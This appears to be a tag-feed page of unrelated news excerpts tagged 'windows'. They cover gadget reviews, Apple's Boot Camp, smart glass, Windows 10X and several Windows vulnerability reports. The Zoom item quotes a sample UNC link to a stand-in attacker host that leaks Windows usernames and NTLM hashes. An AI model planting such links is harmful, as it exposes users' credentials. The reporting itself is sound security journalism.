The lighting system is pretty effective when it comes to a shorthand for what’s on and working with your system, but this is one area where it might be nice to have a more comprehensive on-device audio levels display, for instance. Still, it does the job, and since you’ll likely be working with some kind of digital audio workflow software whenever you’re using it that will have a much more detailed visualizer, it’s not really that much of an issue.

Bottom line

As mentioned, iRig Pro Duo works with virtually all platforms out of the box, and has physical connector cables to ensure it can connect to just about every one as well. IK Multimedia also supplies free DAW software and effects, for all platforms — though you do have to make a choice about which one you’re most interested in since it’s limited to one piece of software per customer.

If you’re looking for a simple, painless and versatile way to either set up a way to lay down some music, or to record a solo or interview podcast, this is an option that ticks essentially all the boxes you could come up with.

#android, #audio-recording, #gadget, #gadgets, #hardware, #ik-multimedia, #ios, #irig, #mac, #reviews, #tc, #windows


Here’s what’s happening to Boot Camp amid the Apple silicon transition

The 2020 13-inch MacBook Pro

Enlarge / The 2020 13-inch MacBook Pro running macOS. (credit: Samuel Axon)

When Apple announced its plans to transition the Mac to its own, ARM-based silicon and away from the x86 architecture used in Intel Macs, the company listed a plethora of tools for making sure as many applications survive the shift as possible. But while it’s helpful that Apple is providing developer tools for adapting Intel Mac apps and virtualization tools for running the apps that won’t make the move right away, there’s one scenario Apple didn’t talk about at all during its keynote: running Windows natively on a Mac.

Presently, Apple offers a tool in macOS called Boot Camp that facilitates the installation of Windows on another drive or partition, right from macOS. It includes drivers and other boons that make the process a lot simpler than it might be otherwise. Once users install Windows by this method, they’re running it natively on the machine just like they would on a Windows laptop from Dell or Lenovo.

While virtualization via tools like Parallels or VMWare are usually sufficient for running most Windows apps under macOS, there are some edge cases when the Boot Camp approach is the only option. One of the most common: running Windows PC games, which tend to run more optimally under Windows than they do under macOS, no matter how well done the ports are. (This is, in part, because the games were built with Windows in mind, and it’s also because Apple’s macOS video drivers emphasize different priorities.)

Read 4 remaining paragraphs | Comments

#apple, #apple-silicon, #boot-camp, #dual-boot, #mac, #macos, #tech, #windows


Microsoft is adding Linux, Android, and firmware protections to Windows

Screenshot of antivirus protection.


Microsoft is moving forward with its promise to extend enterprise security protections to non-Windows platforms with the general release of a Linux version and a preview of one for Android. The software maker is also beefing up Windows security protections to scan for malicious firmware.

The Linux and Android moves—detailed in posts published on Tuesday here, here, and here—follow a move last year to ship antivirus protections to macOS. Microsoft disclosed the firmware feature last week.

Premium pricing

All the new protections are available to users of Microsoft Advanced Threat Protection and require Windows 10 Enterprise Edition. Public pricing from Microsoft is either non-existent or difficult to find, but according to this site, costs range from $30 to $72 per machine per year to enterprise customers.

Read 7 remaining paragraphs | Comments

#biz-it, #firmware, #linux, #macos, #microsoft, #microsoft-defender, #security, #tech, #windows


Exploit code for wormable flaw on unpatched Windows devices published online

Exploit code for wormable flaw on unpatched Windows devices published online

Enlarge (credit: Windows)

A researcher has published exploit code for a Microsoft Windows vulnerability that, when left unpatched, has the potential to spread from computer to computer with no user interaction.

So-called wormable security flaws are among the most severe, because the exploit of one vulnerable computer can start a chain reaction that rapidly spreads to hundreds of thousands, millions, or tens of millions of other vulnerable machines. The WannaCry and NotPetya exploits of 2017, which caused worldwide losses in the billions and tens of billions of dollars respectively, owe their success to CVE-2017-0144, the tracking number for an earlier wormable Windows vulnerability.

Also key to the destruction was reliable code developed by and later stolen from the National Security Agency and finally published online. Microsoft patched the flaw in March 2017, two months before the first exploit took hold.

Read 12 remaining paragraphs | Comments

#biz-it, #exploits, #microsoft, #vulnerabilities, #windows


‘The Sunday Read’: Letters of Recommendation

Our worlds are smaller now. So for today, expand yours by peering through the views offered by a writer’s window, a grandmother’s diary and a believer’s superstition.

#audm-inc, #diaries, #superstitions, #windows


Smart glass manufacturer Click Materials inks major deal to challenge $1 billion-backed View Inc.

Click Materials, a Vancouver-based developer of “smart glass” has inked a major partnership with one fo the largest manufacturers of windows for the home, Cardinal Glass, as it looks to challenge the billion dollar-backed View Inc.

Founded in 2016 by a University of British Columbia professor, Curtis Berlinguette, Click Materials has raised only a few hundred thousand dollars in seed funding. But the technology that Berlinguette’s company is developing could provide a lower-cost more flexible option to traditional photochromatic deposition — which can be applied to plastic as well as glass.

Smart glass gets its name from the coatings that are applied to transparent surfaces (typically glass) that allow users to customize the tint of the surface between clear and dark states. The result is more control over heat and light levels in an environment. It turns out that exposure to sunlight has implications for mental health and can enable dramatic cost savings in heating and cooling for any built environment.

Click Materials claims that its windows can reduce heating and cooling costs by up to fifty percent and that it can achieve those reductions while slashing manufacturing costs by as much as sixty percent.

Through the partnership with Cardinal Glass, Click will be building out a pilot plant that could give the upstart company manufacturing capacity to reach nearly $25 million in annual revenue, according to founder and chief executive, Curtis Berlinguette.

A typical plant of that size could cost at least $10 million, according to industry experts, but Click’s process — leveraging automation and existing manufacturing lines — means that a pilot can be built for a fraction of that cost, according to industry insiders.

“The first pilot plant is to prove out the product and get it refined,” says Berlinguette. And the company has other potential partnerships lined up to take its smart window products into commercial real estate and even auto manufacturing, Berlinguette said.  

The company has scaled from one employee as recently as a year ago to a staff of ten now with plans to add another 15 employees by the end of the year.

Image courgesy of Click Materials

While smart glass may seem like an odd investment thesis, the technology has received attention from a diverse array of investors. SoftBank’s Vision Fund is a major investor in the market through View Inc., which has raised roughly $1.8 billion in funding, according to Crunchbase. Another big player in the world of smart glass technologies is the multi-billion dollar French industrial conglomerate Saint-Gobain, which bought Sage Electrochromics back in 2012.

“Both of those companies have cleared a path for us because they’ve educated the market,” said Berlinguette. “The way they make their products — even with economies of scale you won’t be able to bring the cost of making those windows down to a level that’s accessible for the residential market. Those products are two to three times too expensive for the residential sector.”

Cardinal, a longtime leader in residential glass manufacturing and construction, was impressed with the new process that Click had developed, according to a statement from the company.

“Click Material’s proprietary deposition method enables uniform, optically-pure coatings that can be sprayed at ambient conditions and has the potential to disrupt the electrochromic window industry in the residential market and beyond,” said Keith Burrows, Technology Scouting & IP Manager at Cardinal Glass.

The potential to revolutionize design using smart glass extend far beyond the residential market, according to Berlinguette. Indeed, one of the areas where the company’s technology could have a significant impact is in the design of electric vehicles.

Heating and cooling can significantly reduce the range of electric vehicles, and the use of smart glass can, conceivably, increase efficiency significantly, Berlinguette said.

“As consumer appetite to bring smart technologies into the home grows, Click is delivering innovative advancements to window technology that will truly transform the way we experience our connected homes in the future,” said Berlinguette, in a statement. “The opportunities here are immense; heating, cooling and lighting account for 35% of home energy consumption, half of which can be lost through windows. Studies have also shown that greater control over lighting can dramatically improve energy, mood and personal well-being. Our partnership with Cardinal Glass is a massive leap towards bringing the future of windows into the present, with just one Click.”

#energy, #glass, #leader, #materials, #matter, #real-estate, #smart-glass, #smart-technologies, #softbank, #tc, #vancouver, #windows


Don’t expect to see Windows 10X dual-screen devices this year

With Windows 10X, Microsoft introduced a new version of its flagship operating system last October that was specifically designed for dual-screen devices. The original plan was to launch the first set of Windows 10X dual-screen devices before the 2020 holidays and in February of this year, it announced a slew of tools to help developers get ready for this new form factor. Today, it announced that it is pivoting Windows 10X away from dual-screen devices for the time being. And that means we likely won’t see any dual-screen Windows devices anytime soon.

In a blog post today, Microsoft’s Windows and devices chief Panos Panay said that the company has made this decision because at this time, it wants to focus on what it’s customers need right now and to “focus on meeting customers where they are now.” While Panay doesn’t quite spell it out in his blog post, the idea here is clearly that given the unprecedented environment during the coronavirus pandemic, Microsoft doesn’t want to emphasize new form factors but put its efforts behind improving its existing tools and services.

“With Windows 10X, we designed for flexibility, and that flexibility has enabled us to pivot our focus toward single-screen Windows 10X devices that leverage the power of the cloud to help our customers work, learn and play in new ways,” Panay writes. “These single-screen devices will be the first expression of Windows 10X that we deliver to our customers, and we will continue to look for the right moment, in conjunction with our OEM partners, to bring dual-screen devices to market.”

A single-screen Windows 10X device sounds a lot like a regular laptop, 2-in-1 or tablet. Microsoft declined to define what these first Windows 10X devices will look like and only told us that there’s “more to come.” We’ll be here when that happens.

In his post today, Panay also stressed that the company wants to accelerate innovation in Windows 10 “to ensure that Windows devices are the best way to work, learn and play.” He didn’t share any further details of what exactly that means.

What Panay did say, though, is that Microsoft users now spend 4 trillion minutes a month on Windows 10. That’s an increase of 75 percent year-over-year.

#computing, #microsoft, #microsoft-windows, #operating-system, #operating-systems, #panos-panay, #tc, #windows, #windows-10


Classic Skyscrapers Define New York. Take a Virtual Tour.

The epitome of the ‘Mad Men’ era, the sleek midcentury buildings of Park Avenue glimmer. Our critic strolls with the architect Annabelle Selldorf.

#architecture, #bunshaft-gordon, #citigroup-inc, #demolition, #foster-norman, #historic-buildings-and-sites, #huxtable-ada-louise, #johnson-philip, #lever-house-manhattan-ny, #manhattan-nyc, #metlife-building-manhattan-ny, #mies-van-der-rohe-ludwig, #park-avenue-manhattan-ny, #restoration-and-renovation, #selldorf-architects, #selldorf-annabelle, #skidmore-owingsmerrill, #windows


Microsoft patches 4 Windows 0days under active exploit

A man looks at the home screen for the "new" Windows 7 platform when it was launched in October 2009. Microsoft has ended support, but the OS lives on.

Enlarge / A man looks at the home screen for the “new” Windows 7 platform when it was launched in October 2009. Microsoft has ended support, but the OS lives on. (credit: Katie Collins – PA Images / Getty Images)

Microsoft has patched four actively exploited vulnerabilities that allow attackers to execute malicious code or elevate system privileges on devices that run Windows.

Two of the security flaws—tracked as CVE-2020-1020 and CVE-2020-0938—reside in the Adobe Type Manager Library, a Windows DLL file that a wide variety of apps use to manage and render fonts available from Adobe Systems. On supported operating systems other than Windows 10, attackers who successfully exploit the vulnerabilities can remotely execute code. On Windows 10, attackers can run code inside an AppContainer sandbox. The measure limits the system privileges malicious code has, but even then, attackers can use it to create accounts with full user rights, install programs, and view, change, or delete data.

Attackers can exploit the flaws by convincing a target to open a booby-trapped document or viewing it in the Windows preview pane. Tuesday’s advisories said that Microsoft is “aware of limited, targeted attacks that attempt to leverage” both vulnerabilities. Microsoft revealed last month that one of the bugs was being exploited in limited attacks against Windows 7 machines.

Read 10 remaining paragraphs | Comments

#biz-it, #exploits, #microsoft, #patch-tuesday, #security-flaws, #updates, #vulnerabilities, #windows


Attackers can use Zoom to steal users’ Windows credentials with no warning

Attackers can use Zoom to steal users’ Windows credentials with no warning

Enlarge (credit: Christopher Blizzard)

Users of Zoom for Windows beware: the widely used software has a vulnerability that allows attackers to steal your operating system credentials, researchers said.

Discovery of the currently unpatched vulnerability comes as Zoom usage has soared in the wake of the coronavirus pandemic. With massive numbers of people working from home, they rely on Zoom to connect with co-workers, customers, and partners. Many of these home users are connecting to sensitive work networks through temporary or improvised means that don’t have the benefit of enterprise-grade firewalls found on-premises.

Embed network location here

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings—such as \\attacker.example.com/C$—into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

Read 10 remaining paragraphs | Comments

#biz-it, #credentials, #exploits, #vulnerabilities, #windows, #zoom


Windows code-execution zeroday is under active exploit, Microsoft warns

Windows code-execution zeroday is under active exploit, Microsoft warns

Enlarge (credit: Windows)

Attackers are actively exploiting a Windows zero-day vulnerability that can execute malicious code on fully updated systems, Microsoft warned on Monday.

The font-parsing remote code-execution vulnerability is being used in “limited targeted attacks,” the software maker said in an advisory published on Monday morning. The security flaw exists in the Adobe Type Manager Library, a Windows DLL file that a wide variety of apps use to manage and render fonts available from Adobe Systems. The vulnerability consists of two code-execution flaws that can be triggered by the improper handling of maliciously crafted master fonts in the Adobe Type 1 Postscript format. Attackers can exploit them by convincing a target to open a booby-trapped document or viewing it in the Windows preview pane.

“Microsoft is aware of limited, targeted attacks that attempt to leverage this vulnerability,” Monday’s advisory warned. Elsewhere the advisory said: “For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.”

Read 9 remaining paragraphs | Comments

#biz-it, #exploits, #flaw, #microsoft, #vulnerabilities, #windows


Windows has a new wormable vulnerability, and there’s no patch in sight

Close-up photo of police-style caution tape stretched across an out-of-focus background.

Enlarge (credit: Michael Theis / Flickr)

Word leaked out on Tuesday of a new vulnerability in recent versions of Windows that has the potential to unleash the kind of self-replicating attacks that allowed the WannaCry and NotPetya worms to cripple business networks around the world.

The vulnerability exists in version 3.1.1 of the Server Message Block, the service that’s used to share files, printers, and other resources on local networks and over the Internet. Attackers who successfully exploit the flaw can execute code of their choice on both servers and end-user computers that use the vulnerable protocol, Microsoft said in this bare-bones advisory.

The flaw, which is tracked as CVE-2020-0796, affects Windows 10, versions 1903 and 1909 and Windows Server versions 1903 and 1909, which are relatively new releases that Microsoft has invested huge amounts of resources hardening against precisely these types of attacks. Patches aren’t available, and Tuesday’s advisory gave no timeline for one being released. Asked if there was a timeline for releasing a fix, a Microsoft representative said, “Beyond the advisory you linked, nothing else to share from Microsoft at this time.”

Read 15 remaining paragraphs | Comments

#biz-it, #computer-worms, #exploits, #microsoft, #vulnerabilities, #windows